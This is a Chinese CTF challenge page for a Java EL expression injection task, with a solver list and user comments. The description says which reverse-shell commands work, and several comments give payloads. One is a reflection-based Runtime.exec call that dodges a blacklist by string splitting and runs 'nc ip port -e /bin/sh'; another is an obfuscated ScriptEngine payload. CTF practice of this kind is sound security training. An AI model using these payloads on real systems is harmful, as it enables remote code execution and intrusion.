Java EL表达式注入WEB 未解决
分数:
35
金币:
4
题目作者:
云牧青
一 血:
广告位招租
一血奖励:
10金币
解 决:
98
提 示:
描 述:
/bin/bash: X ; /bin/sh √ ; /dev/tcp X ; nc -e ip port X ; nc ip port -e √ ;
评分(2)
解题动态
wubobo 攻破了该题 11小时前
KingOfDark 攻破了该题 4天前
林志伟-042 攻破了该题 13天前
suxiansheng 攻破了该题 14天前
SUPREME 攻破了该题 18天前
sectmp 攻破了该题 19天前
nina 攻破了该题 28天前
dlgz 攻破了该题 1月前
蓝色 攻破了该题 1月前
745451557 攻破了该题 1月前
小马哥 攻破了该题 3月前
jerryxucy 攻破了该题 3月前
w111 攻破了该题 3月前
binyu 攻破了该题 4月前
SkyAsh 攻破了该题 4月前
yanzhenfeng 攻破了该题 5月前
网恋秀牛子被录屏导致自卑 攻破了该题 5月前
ycxlo 攻破了该题 6月前
Achernar 攻破了该题 6月前
评论
qq1002517 4月前
举报
反弹服务器没的。算鸟
binyu 4月前
举报
''.getClass().forName('java.lang.Run'+'time').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Run'+'time').getMethod('getRu'+'ntime').invoke(null),'nc ip port -e /bin/sh')
李逍遥逛霍格沃茨 4月前
举报
浪费时间和金币的题目,花金币买了write up也做不出来 最大问题是反向连接建立不了 按照两边的教程监听端口一点反应都没有 纹丝不动
l1nci 1年前
举报
做不出来,金币-5,呜呜呜
ailx10 1年前
举报
嘻嘻,参考:https://zhuanlan.zhihu.com/p/721560334
lzhui 2年前
举报
金币 -5
blackjack009 2年前
举报
new javax.script.ScriptEngineManager().getEngineByName(new String(new byte[]{106,115})).eval(new String(new byte[]{106...........}));
jack12138 3年前
举报
利用Java反射机制实现RCE,参考:http://www.hackdig.com/08/hack-459909.htm,题中用''.getClass()替代了Class,黑名单可利用字符串拼接绕过,如''.getClass().forName('java.lang.Run'+'time')
jack12138 3年前
举报
没做出来,记录一下,应该跟 MVEL.eval 有关系?没试出来
chips 3年前
举报
好难 金币-5